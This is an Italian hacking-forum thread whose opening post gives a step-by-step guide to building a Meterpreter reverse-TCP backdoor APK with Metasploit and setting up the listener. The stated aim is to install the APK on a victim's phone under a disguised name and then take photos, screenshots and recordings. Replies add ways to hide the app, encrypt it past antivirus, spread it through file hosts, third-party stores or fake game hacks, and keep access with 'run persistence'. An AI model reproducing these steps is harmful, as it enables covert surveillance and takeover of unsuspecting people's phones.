Guida [GUIDA] come hackerare dispositivo android con backdoor !

[B4ckReMix95]

ciaooo a tutti ragazzi ! sono nuovo nel forum ! :spam: questa è la mia prima guidaaaa

come da titolo ecco come creare una backdoor tramite un'apk creata tramite payload con kali linux =)

PREMESSA:
la guida originale in inglese la trovate qui --> Hacking Android Smartphone using Metasploit in Kali Linux « Hacking With Kali Linux
ed il video tutorial qui --> https://www.youtube.com/watch?v=ajBIrmnLTfA#t=267

io ho solo voluto testare la guida e riproporla in italiano passo passo per dare una mano a tutti

allora iniziamooo

passo 1 :

iniziamo con il digitare nel terminale il payload da utilizzare con relativo nostro indirizzo ip ( reperibile tramite il comando "ifconfig" e poi sulla voce " inet addr= ... " ) e la porta da utilizzare.

 msfpayload android/meterpreter/reverse_tcp LHOST=<nostro ip> LPORT=<nostra porta> R > hack.apk

ps. consiglio la porta "443" e di personalizzare il nome dell'apk.

passo 2 :

apriamo msfconsole da terminale !

passo 3 :

selezioniamo l'exploit

use exploit/multi/handler

selezioniamo il payload

set payload android/meterpreter/reverse_tcp

settiamo l'indirizzo ip preimpostato

set lhost <ip>

settiamo la porta preimpostata

set lport 443

ora digitiamo exploit e mettiamoci finalmente in ascolto !! =) installate l' apk sul device della vittima ( cambiando immagina nome e con una bella scusa ) potremo con i vari comandi ( webcam_list, sysinfo, webcam_sanp ecc.. ) fare foto, screen, registrare messaggi ecc. come una backdoor per pc!

grazie a tutti e buon divertimento !!

 

[Fanz]

boo nn saprei se fosse possibile inserirlo in un applicazione :/ alla fine ti ritrovi con un apk che è solo da installare, poi crea l'icona della finta applicazione.
criptare per evitare che l'antivirus dello smartphone la individui come virus ! alla fine è lo stesso metodo che usi cn le backdoor normale ( credo che la cifratura si chiami "shitakaganai" ) nn vorrei sbagliare

Nessuno, tranne quelli con un Q.I superiore alla media, ha un antivirus sul cellulare, soprattutto i ragazzi.

 

[Nhoya]

Bella guida, grazie per la condivisione

 

[MArluc]

Bella guida davvero ho una sola domanda, come faccio ad inviare il file .apk?????

 

[B4ckReMix95]

be, bisognerebbe usare un po di social engineering , il modo piu facile sarebbe installarlo manualmente sul device della vittima, se la vittima ha un launcher (tipo nova launcher ) si puo nascondere l'applicazione in modo da non farla proprio vedere nella lista delle applicazioni.
ce da tenere conto anche di una cosa, se non criptiamo l' apk verrà identificato come virus.

 

[examinedcastle]

Nel caso si riuscirebbe ad inserire la backdoor all'interno di una applicazione? Così che al momento dell'avvio l'applicazione faccia quello che deve fare e avvi la backdoor?
P.s. Non ho capito bene il fatto di criptare la backdoor..in cosa consiste?

 

[AlphaAttack]

Appena posso provo,comunque sia ottima share!

//Working

 

[AlphaAttack]

@Pester @Primary
Dovete uppare l'apk su qualche host tipo Sendspace,Mediafire,Mega etc. Oppure inseritelo in qualche store per apk( Es: Aptoide ) o,in alternativa, potete spacciarlo per un hack di un gioco X poiché gli APK moddati devono essere installati senza verifica Google

 

[Pester]

Metodo utilizzato tempo fa dall'applicazione "My Talking...".

 

[B4ckReMix95]

boo nn saprei se fosse possibile inserirlo in un applicazione :/ alla fine ti ritrovi con un apk che è solo da installare, poi crea l'icona della finta applicazione.
criptare per evitare che l'antivirus dello smartphone la individui come virus ! alla fine è lo stesso metodo che usi cn le backdoor normale ( credo che la cifratura si chiami "shitakaganai" ) nn vorrei sbagliare

 

[Primary]

Scusate l'ignoranza ma ho due domande da farvi:
1) Come copio l'apk da Kali a windows per poi inserirla nel device vittima?
2) Ogni volta che devo svolgere "l'attacco" (intendo i comandi per visualizzare foto, informazioni del device) devo rifare tutto il procedimento? (Non credo, cosa devo digitare per ritrovarmi al punto in cui ho lasciato?).

 

[FedeSchina99]

Nessuno, tranne quelli con un Q.I superiore alla media, ha un antivirus sul cellulare, soprattutto i ragazzi.

Sono un ragazzo, ho un antivirus ottimo su Android, bah.

 

[text]

Gli AV per android sono in una parola ridicoli.

 

[Primary]

Ho fatto una domanda... Nessuno sa rispondermi?

 

[Fanz]

Sono un ragazzo, ho un antivirus ottimo su Android, bah.

Soprattutto non significa che tutti i ragazzi non hanno un antivirus sul telefono.

Spoiler

soprattutto
[so-prat-tùt-to]
o sopratutto, ant. sópra tùtto
avv.
Sopra ogni altra cosa, prima e più di tutto: vi raccomando s. l'ordine e la disciplina; voglio s. che tu sia felice
‖ Specialmente, particolarmente: questa costa marina è bella s. d'inverno; raccomando s. a voi il rispetto dei regolamenti

"Bah"

Ho fatto una domanda... Nessuno sa rispondermi?

Non fare post ogni due secondi, un attimo di pazienza perchè non siamo rambo e soprattutto non dobbiamo essere costretti ad aiutarti, ad ogni modo, no, non è necessario reinstallare l'apk ogni volta.
Il comando che cerchi per non rifare tutto è

run persistence

Per maggiori informazioni riguardo al comando:

run persistence -h

 

[Primary]

Non ho fatto post ogni due secondi. Ho fatto due post a distanza di 30 minuti.

Comunque, per la prima domanda? Come faccio a copiare il file su windows o inviarlo al device?

 

[Nhoya]

Nessuno, tranne quelli con un Q.I superiore alla media, ha un antivirus sul cellulare, soprattutto i ragazzi.

Quando capirete che gli antivirus sono inutili?

 

[FedeSchina99]

Soprattutto non significa che tutti i ragazzi non hanno un antivirus sul telefono.

:grammar:
A casa mia soprattutto è un rafforzativo, non un limitativo. Bah.

Per non andare OT, direi che 4shared is the way.

 

[Fanz]

Quando capirete che gli antivirus sono inutili?

Io sinceramente non lo uso, se devo verificare un'applicazione uso la funzionalità di Google 'Verifica applicazione', ma ad ogni modo credo che non siano del tutto inutili.

 

[FedeSchina99]

Quando capirete che gli antivirus sono inutili?

Mi risparmia il dover cancellare tutti gli adware che trovo sui market esterni, non fa miracoli ma aiuta

 

[Pester]

Non ho fatto post ogni due secondi. Ho fatto due post a distanza di 30 minuti.

Comunque, per la prima domanda? Come faccio a copiare il file su windows o inviarlo al device?

Ehm... Anch'io stessa domanda.
Ma qui non risponde nessuno..

 

[Pester]

@Pester @Primary
Dovete uppare l'apk su qualche host tipo Sendspace,Mediafire,Mega etc. Oppure inseritelo in qualche store per apk( Es: Aptoide ) o,in alternativa, potete spacciarlo per un hack di un gioco X poiché gli APK moddati devono essere installati senza verifica Google

Come diavolo non c'ho pensato prima?
Utilizzo il primo metodo. Grazie ahaha

 

[B4ckReMix95]

allora potresti creare una cartella condivisa tra windows e kali.. ma per non complicarti le cose usa una pennina usb per passare il file da kali a windows e per riprendere da dove hai lasciato dovresti rimetterti in ascolto

 

[Pester]

A me comunque non funziona. Scarico la BackDoor su uno smartphone, la installo e dopo faccio il procedimento nella msfconsole
E rimane cosi:

[*]Starting the payload handler...

 

[lDraik]

A me comunque non funziona. Scarico la BackDoor su uno smartphone, la installo e dopo faccio il procedimento nella msfconsole
E rimane cosi:
[*]Starting the payload handler...

Dovresti prima installare l'applicazione, dopo lanciare msfconsole e dopo avviare l'applicazione